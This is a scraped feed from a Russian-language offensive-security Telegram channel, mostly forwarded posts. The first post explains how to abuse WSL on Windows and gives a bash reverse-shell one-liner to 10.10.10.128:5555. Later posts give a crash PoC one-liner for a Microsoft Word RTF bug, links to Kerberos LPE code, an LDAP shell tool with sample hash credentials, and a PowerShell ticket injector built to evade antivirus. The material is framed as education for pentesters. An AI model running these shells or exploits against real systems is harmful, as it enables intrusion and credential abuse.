Похек
16.6K subscribers
2.1K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Monkey Hacker
Abuse WSL

#RU

Windows Subsystem for Linux (WSL) - по факту данная функция в Windows, дает доступ к компактной версии файловой системе Linux, т.е мы можем выполнять практически любые команды Linux в Windows.
И естественно благодаря данной функции мы можем выполнить различные хитрости, которые нам недоступны как обычному пользователю, но можем выполнить в пределах нашего шелла. Нужны самые стандартные права пользователя, но важно, чтобы мы смогли выполнить wsl --install для включения данного функционала.
Потом убеждаемся, что данный функционал действительно работает и смотрим, доступен ли нам какой-либо дистрибутив Linux (по стандарту там будет Ubuntu)

#EN

Windows Subsystem for Linux (WSL) - in fact this function in Windows, gives us access to a compact version of the Linux file system, i.e. we can execute almost any Linux command in Windows.
And of course with this feature we can do all sorts of tricks which we can't do as a normal user but we can do within our shell. We need the most standard user rights, but it is important that we can run wsl --install to enable this feature.
Then we make sure that this feature really works and check if any Linux distro is available for us (by default this would be Ubuntu)

wsl --list --running

#RU

Если все ок, то проверьте, что у вас есть еще доступ к bash оболочке (bash.exe). Обычно он имеет путь следующий:
C:\Windows\system32\bash.exe

#EN

If everything is ok, check that you have access to the bash shell (bash.exe). It usually has the path as follows:
C:\Windows\system32\bash.exe

Начинаем с базового | Starting with basic

wsl.exe "whoami"

OR

bash.exe -c "whoami"

Если ответ видим root, то можно попробовать rev-shell | If the answer is root, you can try rev-shell

bash.exe -c "bash -i >& /dev/tcp/10.10.10.128/5555 0>&1"

#RU

P.S если что то это не тот же самый root, который есть в виндовой тачке, однако мы можем выполнять теперь те действия, которые изначально нам не были доступны

#EN

P.S it is not the same as root, which is in the wind machine, but we can now do things that were not originally available to us

#RU

Мы можем выполнять/модифицировать различные бинари на основной машине

#EN

We can run/modify different binary on the main machine

wsl.exe -e /mnt/c/Windows/System32/NeTrojan.exe

Have fun 👀
Please open Telegram to view this post
VIEW IN TELEGRAM
День Винды получается )
🫡10🤝2
Forwarded from Private Shizo
urbandoor.cs
7.9 KB
🔥Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
Forwarded from Private Shizo
💥Nokoyawa ransomware attacks with Windows zero-day
In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions.

This is the one bug(CVE-2023-28252) under active attack this month, and if it seems familiar, that’s because there was a similar 0-day patched in the same component just two months ago. To me, that implies the original fix was insufficient and attackers have found a method to bypass that fix. As in February, there is no information about how widespread these attacks may be. This type of exploit is typically paired with a code execution bug to spread malware or ransomware.
1
Forwarded from Private Shizo
👨‍💻 Начинаешь карьеру в информационной безопасности? Приходи на оплачиваемую стажировку ВТБ — Школу по информационной безопасности!

⚡️ За 3 месяца ты получишь знания от экспертов ВТБ, опыт работы в топовой компании + навыки, необходимые для дальнейшего роста. Ну и конечно, конкурентную зарплату, ДМС со стоматологией, скидки от партнеров и многое-многое другое!

А еще:
— возможность перейти в штат по итогам стажировки с повышением оклада;
— надежную и стабильную работу в одном из крупнейших банков страны;
— нетворкинг и погружение в профессиональное комьюнити;
— обучение 40% времени, чтобы твои знания оставались самыми востребованными!

👾 Успей зарегистрироваться на стажировку: https://bit.ly/infosec-intern-VTB

#промо
🗿5🔥3
Класс, новая программа на bi.zone
Forwarded from BI.ZONE Bug Bounty
🪲 +1 программа: Timeweb на BI.ZONE Bug Bounty

Встречайте новую программу от Timeweb — одного из крупнейших облачных провайдеров России!

Вилка выплат — от 10 000 до 250 000 рублей. Стоимость бага зависит от критичности и домена.

Скоуп в этот раз просто огромный: одного поста не хватит, чтобы перечислить все.

Так что смотрите список доменов и прайс на нашей платформе!
Please open Telegram to view this post
VIEW IN TELEGRAM
Форум CISO-FORUM XVI
🫡6
Serv-U [v.15.3.0.X] Directory-Traversal
CVE-2021-35250


Уязвимость позволяет удаленному пользователю выполнить атаку Directory Traversal, отправив специально созданный HTTP запрос и прочитав произвольные файлы в системе. Чтение файлов возможно только на диске C:\, злоумышленник может получить информацию о файловом сервере, только зная путь к файлам.

Известно 3 варианта того, какие файлы и как может читать злоумышленник:
1. Файлы Windows по умолчанию. Пример: "C:\Windows\win.ini";
2. Обнаружение файлов с помощью брутфорса;
3. Определение путей к файлам в файлах Windows по умолчанию или используемого программного обеспечения на сервере.
🔥5
LDAP shell

Этот проект является форком проекта ldap_shell - impacket.

Подготовка:
sudo apt install -y python3

Установка:
git clone https://github.com/z-Riocool/ldap_shell.git ;cd ldap_shell ; python3 -m pip install .

Пример использования:
ldap_shell.py domain.local/user:password
ldap_shell domain.local/user:password -dc-ip 192.168.1.2
ldap_shell domain.local/user -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404e1
export KRB5CCNAME=/home/user/ticket.ccache
ldap_shell -k -no-pass domain.local/user

#tools
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python

RTF Crash POC Python 3.11 Windows 10

PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join( ("{\\f%dA;}\n" % i) for i in range(0,32761) ) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE
22 апреля пройдет task-based КибХак CTF совместно с mireaCTF (Potee) в режиме онлайн.

👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊

Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.

❗️ Начало в 18:00
👨‍💻 Длительность 18 часов до 12:00 воскресенья

Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web

В каждой команде должно быть не более 5-ти человек

Вся информация будет в канале mireaCTF:
https://t.me/mireactf

И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4

Регистрация уже доступна на:

https://ctf.potee.ru
🔥2🐳1🗿1
Forwarded from RedTeam brazzers (Миша)
Injector.png
1.1 MB
Итак, продолжаем заниматься импортозамещением учиться быть настоящим Red Team'ом и не использовать mimikatz! Недавно у меня вышла статья по инжекту тикетов с помощью плюсовой программы. Но потом мы вспоминаем об антивирусах и становится не так весело. Каждый раз брать проект, добавлять защиту, перекомпиливать... не вариант.
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.

Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64

Полный код можно увидеть на моем гитхабе


По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)